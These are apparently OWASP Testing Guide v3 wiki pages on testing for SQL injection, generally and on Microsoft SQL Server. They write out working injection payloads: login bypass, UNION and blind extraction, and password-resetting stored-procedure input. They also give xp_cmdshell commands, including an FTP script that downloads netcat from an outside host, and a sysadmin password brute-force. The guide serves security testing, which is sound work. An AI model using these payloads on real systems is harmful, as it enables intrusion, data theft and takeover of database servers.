OWASP - User contributions [en]

Testing for SQL Injection (OTG-INPVAL-005)

2009-09-13T12:33:28Z

Inquis:

{{Template:OWASP Testing Guide v3}}

== Brief Summary ==

An [[SQL injection]] attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system and, in some cases, issue commands to the operating system.
SQL injection attacks are a type of [[Top 10 2007-Injection Flaws | injection attack]], in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

==Related Security Activities==

===Description of SQL Injection Vulnerabilities===

See the OWASP article on [[SQL Injection]] Vulnerabilities.

See the OWASP article on [[Blind_SQL_Injection]] Vulnerabilities.

===How to Avoid SQL Injection Vulnerabilities===

See the [[:Category:OWASP Guide Project|OWASP Development Guide]] article on how to [[Guide to SQL Injection | Avoid SQL Injection]] Vulnerabilities.

See the [[:Category:OWASP Code Review Project|OWASP Code Review Guide]] article on how to [[Reviewing Code for SQL Injection|Review Code for SQL Injection]] Vulnerabilities.

See the OWASP Prevention Cheat Sheet Series article on [[SQL Injection Prevention Cheat Sheet | Preventing SQL Injection]]

[[Category:Security Focus Area]]
__NOTOC__

== Description of the Issue ==
SQL Injection attacks can be divided into the following three classes:
* Inband: data is extracted using the same channel that is used to inject the SQL code. This is the most straightforward kind of attack, in which the retrieved data is presented directly in the application web page.
* Out-of-band: data is retrieved using a different channel (e.g., an email with the results of the query is generated and sent to the tester).
* Inferential: there is no actual transfer of data, but the tester is able to reconstruct the information by sending particular requests and observing the resulting behaviour of the DB Server.

Independent of the attack class, a successful SQL Injection attack requires the attacker to craft a syntactically correct SQL Query. If the application returns an error message generated by an incorrect query, then it is easy to reconstruct the logic of the original query and, therefore, understand how to perform the injection correctly. However, if the application hides the error details, then the tester must be able to reverse engineer the logic of the original query. The latter case is known as "[[Blind SQL Injection]]".

== Black Box testing and example ==

=== SQL Injection Detection ===

The first step in this test is to understand when our application connects to a DB Server in order to access some data. Typical examples of cases when an application needs to talk to a DB include:
* Authentication forms: when authentication is performed using a web form, chances are that the user credentials are checked against a database that contains all usernames and passwords (or, better, password hashes)
* Search engines: the string submitted by the user could be used in a SQL query that extracts all relevant records from a database
* E-Commerce sites: the products and their characteristics (price, description, availability, ...) are very likely to be stored in a relational database.
The tester has to make a list of all input fields whose values could be used in crafting a SQL query, including the hidden fields of POST requests and then test them separately, trying to interfere with the query and to generate an error.
The very first test usually consists of adding a single quote (') or a semicolon (;) to the field under test. The first is used in SQL as a string terminator and, if not filtered by the application, would lead to an incorrect query. The second is used to end a SQL statement and, if it is not filtered, it is also likely to generate an error.
The output of a vulnerable field might resemble the following (on a Microsoft SQL Server, in this case):
<pre>
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/target/target.asp, line 113
</pre>
Also comments (--) and other SQL keywords like 'AND' and 'OR' can be used to try to modify the query. A very simple but sometimes still effective technique is simply to insert a string where a number is expected, as an error like the following might be generated:
<pre>
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
varchar value 'test' to a column of data type int.
/target/target.asp, line 113
</pre>
A full error message, like those in the examples, provides a wealth of information to the tester in order to mount a successful injection. However, applications often do not provide so much detail: a simple '500 Server Error' or a custom error page might be issued, meaning that we need to use blind injection techniques.
In any case, it is very important to test *each field separately*: only one variable must vary while all the other remain constant, in order to precisely understand which parameters are vulnerable and which are not.

=== Standard SQL Injection Testing ===

Consider the following SQL query:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'

A similar query is generally used from the web application in order to authenticate a user. If the query returns a value it means that inside the database a user with that credentials exists, then the user is allowed to login to the system, otherwise the access is denied.
The values of the input fields are generally obtained from the user through a web form.
Suppose we insert the following Username and Password values:

$username = 1' or '1' = '1
$password = 1' or '1' = '1

The query will be:

<nowiki>SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'</nowiki>
If we suppose that the values of the parameters are sent to the server through the GET method, and if the domain of the vulnerable web site is www.example.com, the request that we'll carry out will be:

<nowiki>http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1&password=1'%20or%20'1'%20=%20'1 </nowiki>

After a short analysis we notice that the query returns a value (or a set of values) because the condition is always true (OR 1=1). In this way the system has authenticated the user without knowing the username and password. ''In some systems the first row of a user table would be an administrator user. This may be the profile returned in some cases.''
Another example of query is the following:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))

In this case, there are two problems, one due to the use of the parentheses and one due to the use of MD5 hash function.
First of all, we resolve the problem of the parentheses.
That simply consists of adding a number of closing parentheses until we obtain a corrected query. To resolve the second problem, we try to invalidate the second condition.
We add to our query a final symbol that means that a comment is beginning. In this way, everything that follows such symbol is considered a comment.
Every DBMS has its own symbols of comment, however, a common symbol to the greater part of the database is /*. In Oracle the symbol is "--".
This said, the values that we'll use as Username and Password are:

$username = 1' or '1' = '1'))/*
$password = foo

In this way, we'll get the following query:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))

The URL request will be:

<nowiki>http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=foo </nowiki>

Which returns a number of values. Sometimes, the authentication code verifies that the number of returned tuple is exactly equal to 1. In the previous examples, this situation would be difficult (in the database there is only one value per user).
In order to go around this problem, it is enough to insert a SQL command that imposes the condition that the number of the returned tuple must be one. (One record returned)
In order to reach this goal, we use the operator "LIMIT <num>", where <num> is the number of the tuples that we expect to be returned. With respect to the previous example, the value of the fields Username and Password will be modified as follows:

$username = 1' or '1' = '1')) LIMIT 1/*
$password = foo

In this way, we create a request like the follow:

<nowiki>http://www.example.com/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=foo </nowiki>

=== Union Query SQL Injection Testing ===
Another test involves the use of the UNION operator. This operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of fields of other tables.
We suppose for our examples that the query executed from the server is the following:

SELECT Name, Phone, Address FROM Users WHERE Id=$id

We will set the following Id value:

$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable

We will have the following query:

SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCarTable

which will join the result of the original query with all the credit card users.
The keyword '''ALL''' is necessary to get around queries that use the keyword DISTINCT.
Moreover, we notice that beyond the credit card numbers, we have selected other two values. These two values are necessary, because the two query must have an equal number of parameters, in order to avoid a syntax error.

=== Blind SQL Injection Testing ===
We have pointed out that there is another category of SQL injection, called [[Blind SQL Injection]], in which nothing is known on the outcome of an operation. For example, this behavior happens in cases where the programmer has created a custom error page that does not reveal anything on the structure of the query or on the database. (The page does not return a SQL error, it may just return a HTTP 500).
 
By using the inference methods, it is possible to avoid this obstacle and thus to succeed to recover the values of some desired fields. This method consists of carrying out a series of boolean queries to the server, observing the answers and finally deducing the meaning of such answers.
We consider, as always, the www.example.com domain and we suppose that it contains a parameter named id vulnerable to SQL injection.
This means that carrying out the following request:

<nowiki>http://www.example.com/index.php?id=1' </nowiki>

we will get one page with a custom message error which is due to a syntactic error in the query. We suppose that the query executed on the server is:

SELECT field1, field2, field3 FROM Users WHERE Id='$Id'

which is exploitable through the methods seen previously.
What we want to obtain is the values of the username field. The tests that we will execute will allow us to obtain the value of the username field, extracting such value character by character. This is possible through the use of some standard functions, present practically in every database. For our examples, we will use the following pseudo-functions:

'''SUBSTRING (text, start, length)''': it returns a substring starting from the position "start" of text and of length "length". If "start" is greater than the length of text, the function returns a null value.

'''ASCII (char)''': it gives back ASCII value of the input character. A null value is returned if char is 0.

'''LENGTH (text)''': it gives back the length in characters of the input text.

Through such functions, we will execute our tests on the first character and, when we have discovered the value, we will pass to the second and so on, until we will have discovered the entire value.
The tests will take advantage of the function SUBSTRING, in order to select only one character at a time (selecting a single character means to impose the length parameter to 1), and the function ASCII, in order to obtain the ASCII value, so that we can do numerical comparison. The results of the comparison will be done with all the values of the ASCII table, until the right value is found.
As an example, we will use the following value for ''Id'':

$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1

that creates the following query (from now on, we will call it "inferential query"):

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1'

The previous example returns a result if and only if the first character of the field username is equal to the ASCII value 97. If we get a false value, then we increase the index of the ASCII table from 97 to 98 and we repeat the request. If instead we obtain a true value, we set to zero the index of the ASCII table and we analyze the next character, modifying the parameters of the SUBSTRING function.
The problem is to understand in which way we can distinguish tests returning a true value from those that return false.
To do this, we create a query that always returns false.
This is possible by using the following value for ''Id'':

$Id=1' AND '1' = '2

by which will create the following query:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND '1' = '2'

The obtained response from the server (that is HTML code) will be the false value for our tests.
This is enough to verify whether the value obtained from the execution of the inferential query is equal to the value obtained with the test executed before.
Sometimes, this method does not work. If the server returns two different pages as a result of two identical consecutive web requests, we will not be able to discriminate the true value from the false value. In these particular cases, it is necessary to use particular filters that allow us to eliminate the code that changes between the two requests and to obtain a template. Later on, for every inferential request executed, we will extract the relative template from the response using the same function, and we will perform a control between the two templates in order to decide the result of the test.

In the previous discussion, we haven't dealt with the problem of determining the termination condition for out tests, i.e., when we should end the inference procedure.
A techniques to do this uses one characteristic of the SUBSTRING function and the LENGTH function.
When the test compares the current character with the ASCII code 0 (i.e., the value null) and the test returns the value true, then either we are done with the inference procedue (we have scanned the whole string), or the value we have analyzed contains the null character.

We will insert the following value for the field ''Id'':

$Id=1' AND LENGTH(username)=N AND '1' = '1

Where N is the number of characters that we have analyzed up to now (not counting the null value).
The query will be:

SELECT field1, field2, field3 FROM Users WHERE Id='1' AND LENGTH(username)=N AND '1' = '1'

The query returns either true or false. If we obtain true, then we have completed inference and, therefore, we know the value of the parameter. If we obtain false, this means that the null character is present in the value of the parameter, and we must continue to analyze the next parameter until we find another null value.

The blind SQL injection attack needs a high volume of queries. The tester may need an automatic tool to exploit the vulnerability.
A simple tool which performs this task, via GET requests on the MySql DB, is SqlDumper, which is shown below.

[[Image:sqldumper.jpg]]

=== Stored Procedure Injection ===
Question: How can the risk of SQL injection be eliminated? 
Answer: Stored procedures. 
I have seen this answer too many times without qualifications. Merely the use of stored procedures does not assist in the mitigation of SQL injection. If not handled properly, dynamic SQL within stored procedures can be just as vulnerable to SQL injection as dynamic SQL within a web page. 
When using dynamic SQL within a stored procedure, the application must properly sanitize the user input to eliminate the risk of code injection. If not sanitized, the user could enter malicious SQL that will be executed within the stored procedure. 

Black box testing uses SQL injection to compromise the system.
 
Consider the following SQL Server Stored Procedure: 
Create procedure user_login @username varchar(20), @passwd varchar(20) As
Declare @sqlstring varchar(250)
Set @sqlstring = ‘
Select 1 from users
Where username = ‘ + @username + ‘ and passwd = ‘ + @passwd
exec(@sqlstring)
Go
User input: 
anyusername or 1=1'
anypassword
This procedure does not sanitize the input, therefore allowing the return value to show an existing record with these parameters. 
NOTE: This example may seem unlikely due to the use of dynamic SQL to log in a user, but consider a dynamic reporting query where the user selects the columns to view. The user could insert malicious code into this scenario and compromise the data.
 
Consider the following SQL Server Stored Procedure: 
Create procedure get_report @columnamelist varchar(7900) As
Declare @sqlstring varchar(8000)
Set @sqlstring = ‘
Select ‘ + @columnamelist + ‘ from ReportTable‘
exec(@sqlstring)
Go
User input: 
1 from users; update users set password = 'password'; select *

This will result in the report running and all users’ passwords being updated.
 

== Related Articles ==

* [[Top 10 2007-Injection Flaws]]
* [[SQL Injection]]

Technology specific Testing Guide pages have been created for the following DBMSs:

* [[Testing for Oracle| Oracle]]
* [[Testing for MySQL| MySQL]]
* [[Testing for SQL Server | SQL Server]]

== References ==

'''Whitepapers''' 

* Victor Chapela: "Advanced SQL Injection" - http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
* Chris Anley: "Advanced SQL Injection In SQL Server Applications" - http://www.nextgenss.com/papers/advanced_sql_injection.pdf
* Chris Anley: "More Advanced SQL Injection" - http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
* David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
* Imperva: "Blind SQL Injection" - http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
* Ferruh Mavituna: "SQL Injection Cheat Sheet" - http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/

'''Tools''' 
* [[:Category:OWASP SQLiX Project|OWASP SQLiX]]
* Francois Larouche: Multiple DBMS SQL Injection tool - [http://www.sqlpowerinjector.com/index.htm SQL Power Injector] 
* ilo--: MySql Blind Injection Bruteforcing, Reversing.org - [http://www.reversing.org/node/view/11 sqlbftools] 
* Bernardo Damele A. G.: sqlmap, automatic SQL injection tool - http://sqlmap.sourceforge.net
* icesurfer: SQL Server Takeover Tool - [http://sqlninja.sourceforge.net sqlninja]
* Pangolin: Automated SQL Injection Tool - [http://www.nosec.org/en/pangolin.html Pangolin]

[[Category:FIXME|broken links

* Kevin Spett: "SQL Injection" - http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf
* Kevin Spett: "Blind SQL Injection" - http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf

* Antonio Parata: Dump Files by SQL inference on Mysql - [http://www.ictsc.it/site/IT/projects/sqlDumper/sqldumper.src.tar.gz SqlDumper] 

]]

Testing for SQL Server

2009-09-13T12:32:15Z

Inquis:

{{Template:OWASP Testing Guide v3}}

== Brief Summary ==
In this section some [[SQL Injection]] techniques that utilize specific features of Microsoft SQL Server will be discussed.

== Short Description of the Issue ==
SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute SQL code under the privileges of the user used to connect to the database.

As explained in [[SQL injection]], a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:

* Application parameters in query strings (e.g., GET requests)
* Application parameters included as part of the body of a POST request
* Browser-related information (e.g., user-agent, referrer)
* Host-related information (e.g., host name, IP)
* Session-related information (e.g., user ID, cookies)

Microsoft SQL server has a few unique characteristics, so some exploits need to be specially customized for this application.

== Black Box testing and example ==

===SQL Server Characteristics===

To begin, let's see some SQL Server operators and commands/stored procedures that are useful in a SQL Injection test:

* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query; this won't be necessary in every case)
* query separator: ; (semicolon)
* Useful stored procedures include:
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running. By default, only '''sysadmin''' is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure)
** '''xp_regread''' reads an arbitrary value from the Registry (undocumented extended procedure)
** '''xp_regwrite''' writes an arbitrary value into the Registry (undocumented extended procedure)
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin''' privileges.
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.
 
Let's see now some examples of specific SQL Server attacks that use the aforementioned functions. Most of these examples will use the '''exec''' function.

Below we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file, assuming that the web server and the DB server reside on the same host. The following syntax uses xp_cmdshell:
<pre>
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--
</pre>
Alternatively, we can use sp_makewebtask:
<pre>
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
</pre>
A successful execution will create a file that can be browsed by the pen tester. Keep in mind that sp_makewebtask is deprecated, and, even if it works in all SQL Server versions up to 2005, it might be removed in the future.

In addition, SQL Server built-in functions and environment variables are very handy. The following uses the function '''db_name()''' to trigger an error that will return the name of the database:
<pre>
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name())
</pre>
Notice the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:
<pre>
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )
</pre>
CONVERT will try to convert the result of db_name (a string) into an integer variable, triggering an error, which, if displayed by the vulnerable application, will contain the name of the DB.

The following example uses the environment variable '''@@version ''', combined with a "union select"-style injection, in order to find the version of the SQL Server.
<pre>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--
</pre>
And here's the same attack, but using again the conversion trick:
<pre>
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)
</pre>
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of an SQL-injection attack or direct access to the SQL listener.

In the following, we show several examples that exploit SQL injection vulnerabilities through different entry points.

===Example 1: Testing for SQL Injection in a GET request. ===

The most simple (and sometimes most rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes):

<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki>

If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application.

===Example 2: Testing for SQL Injection in a GET request===

In order to learn how many columns exist

<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki>

===Example 3: Testing in a POST request ===

SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0

A complete post example:

POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki>
Host: vulnerable.web.app
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki>
Content-Type: application/x-www-form-urlencoded
Content-Length: 50 
email=%27&whichSubmit=submit&submit.x=0&submit.y=0

The error message obtained when a ' (single quote) character is entered at the email field is:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '' '.
/forgotpass.asp, line 15

===Example 4: Yet another (useful) GET example===

Obtaining the application's source code

a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--

===Example 5: custom xp_cmdshell===

All books and papers describing the security best practices for SQL Server recommend disabling xp_cmdshell in SQL Server 2000 (in SQL Server 2005 it is disabled by default). However, if we have sysadmin rights (natively or by bruteforcing the sysadmin password, see below), we can often bypass this limitation.
 
On SQL Server 2000:
* If xp_cmdshell has been disabled with sp_dropextendedproc, we can simply inject the following code:
<pre>
sp_addextendedproc 'xp_cmdshell','xp_log70.dll'
</pre>
* If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:
<pre>
CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
</pre>
This code, written by Antonin Foller (see links at the bottom of the page), creates a new xp_cmdshell using sp_oacreate, sp_method and sp_destroy (as long as they haven't been disabled too, of course). Before using it, we need to delete the first xp_cmdshell we created (even if it was not working), otherwise the two declarations will collide.
 
On SQL Server 2005, xp_cmdshell can be enabled by injecting the following code instead:
<pre>
master..sp_configure 'show advanced options',1
reconfigure
master..sp_configure 'xp_cmdshell',1
reconfigure
</pre>

===Example 6: Referer / User-Agent===

The REFERER header set to:

Referer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki>

Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:

User-Agent: user_agent', 'some_ip'); [SQL CODE]--

===Example 7: SQL Server as a port scanner===

In SQL Server, one of the most useful (at least for the penetration tester) commands is OPENROWSET, which is used to run a query on another DB Server and retrieve the results. The penetration tester can use this command to scan ports of other machines in the target network, injecting the following query:
<pre>
select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=foobar;Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5','select 1')--
</pre>
This query will attempt a connection to the address x.y.w.z on port p. If the port is closed, the following message will be returned:
<pre>
SQL Server does not exist or access denied
</pre>
On the other hand, if the port is open, one of the following errors will be returned:
<pre>
General network error. Check your network documentation
</pre>
<pre>
OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error.
</pre>
Of course, the error message is not always available. If that is the case, we can use the response time to understand what is going on: with a closed port, the timeout (5 seconds in this example) will be consumed, whereas an open port will return the result right away.

Keep in mind that OPENROWSET is enabled by default in SQL Server 2000 but disabled in SQL Server 2005.

===Example 8: Upload of executables===

Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here.
If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:
<pre>
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--
exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
</pre>
At this point, nc.exe will be uploaded and available.
 
If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ASCII file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
<pre>
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--
exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--
....
exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--
exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
</pre>
At this point, our executable is available on the target machine, ready to be executed.

There are tools that automate this process, most notably Bobcat, which runs on Windows, and Sqlninja, which runs on Unix (See the tools at the bottom of this page).

===Obtain information when it is not displayed (Out of band)===

Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[Blind SQL Injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested.

Other options for out of band attacks are described in Sample 4 above.

===Blind SQL injection attacks===

====Trial and error====
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors|1]]) against this channel and watch the response. For example, if the web application is looking for a book using a query

select * from books where title='''text entered by the user'''

then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.

====If more than one error message is displayed====
On the other hand, if no prior information is available, there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example:

* In some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated, for instance, by a query with unclosed quotes.
* While in other cases the server will return a 200 OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''.

This one bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.

Another out-of-band method is to output the results through HTTP browseable files.

====Timing attacks====
There is one more possibility for making a blind SQL injection attack when there is not visible feedback from the application: by measuring the time that the web application takes to answer a request. An attack of this sort is described by Anley in ([2]) from where we take the next examples. A typical approach uses the ''waitfor delay'' command: let's say that the attacker wants to check if the 'pubs' sample database exists, he will simply inject the following command:

if exists (select * from pubs..pub_info) waitfor delay '0:0:5'

Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a '''SQL injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information for each query. Hence, using several queries (as many queries as bits in the required information) the pen tester can get any data that is in the database. Look at the following query

declare @s varchar(8000)
declare @i int
select @s = db_name()
select @i = [some value]
if (select len(@s)) < @i waitfor delay '0:0:5'

Measuring the response time and using different values for @i, we can deduce the length of the name of the current database, and then start to extract the name itself with the following query:

if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. Nesting two cycles (one for @byte and one for @bit) we will we able to extract the whole piece of information.

However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL injection attacks cannot be done, as the pen tester should only come up with any time consuming operation that is not filtered. For example

declare @i int select @i = 0
while @i < 0xaffff begin
select @i = @i + 1
end

====Checking for version and vulnerabilities====
The same timing approach can be used also to understand which version of SQL Server we are dealing with. Of course we will leverage the built-in @@version variable. Consider the following query:

select @@version

On SQL Server 2005, it will return something like the following:

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 <snip>

The '2005' part of the string spans from the 22nd to the 25th character. Therefore, one query to inject can be the following:

if substring((select @@version),25,1) = 5 waitfor delay '0:0:5'

Such query will wait 5 seconds if the 25th character of the @@version variable is '5', showing us that we are dealing with a SQL Server 2005. If the query returns immediately, we are probably dealing with SQL Server 2000, and another similar query will help to clear all doubts.

===Example 9: bruteforce of sysadmin password===

To bruteforce the sysadmin password, we can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also "looped" to the local DB Server.
Combining these features with an inferenced injection based on response timing, we can inject the following code:
<pre>
select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')
</pre>
What we do here is to attempt a connection to the local database (specified by the empty field after 'SQLOLEDB') using "sa" and "<pwd>" as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In "Data-mining with SQL Injection and Inference", David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself.
Once we have the sysadmin password, we have two choices:

* Inject all following queries using OPENROWSET, in order to use sysadmin privileges

* Add our current user to the sysadmin group using sp_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system_user.

Remember that OPENROWSET is accessible to all users on SQL Server 2000 but it is restricted to administrative accounts on SQL Server 2005.

== References ==
'''Whitepapers''' 
* David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf
* Chris Anley, "(more) Advanced SQL Injection" - http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf
* Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example" - http://www.unixwiz.net/techtips/sql-injection.html
* Alexander Chigrik: "Useful undocumented extended stored procedures" - http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm
* Antonin Foller: "Custom xp_cmdshell, using shell object" - http://www.motobit.com/tips/detpg_cmdshell
* Paul Litwin: "Stop SQL Injection Attacks Before They Stop You" - http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/
* SQL Injection - http://msdn2.microsoft.com/en-us/library/ms161953.aspx

'''Tools''' 
* Francois Larouche: Multiple DBMS SQL Injection tool - [[http://www.sqlpowerinjector.com/index.htm SQL Power Injector]]
* Northern Monkee: [[http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html Bobcat]]
* icesurfer: SQL Server Takeover Tool - [[http://sqlninja.sourceforge.net sqlninja]]
* Bernardo Damele A. G.: sqlmap, automatic SQL injection tool - http://sqlmap.sourceforge.net

Appendix A: Testing Tools

2009-09-13T12:31:30Z

Inquis:

{{Template:OWASP Testing Guide v3}}

==Open Source Black Box Testing tools==

=== General Testing ===

* '''[[OWASP_WebScarab_Project|OWASP WebScarab]]'''
* '''[[OWASP_CAL9000_Project|OWASP CAL9000]]'''
** CAL9000 is a collection of browser-based tools that enable more effective and efficient manual testing efforts.
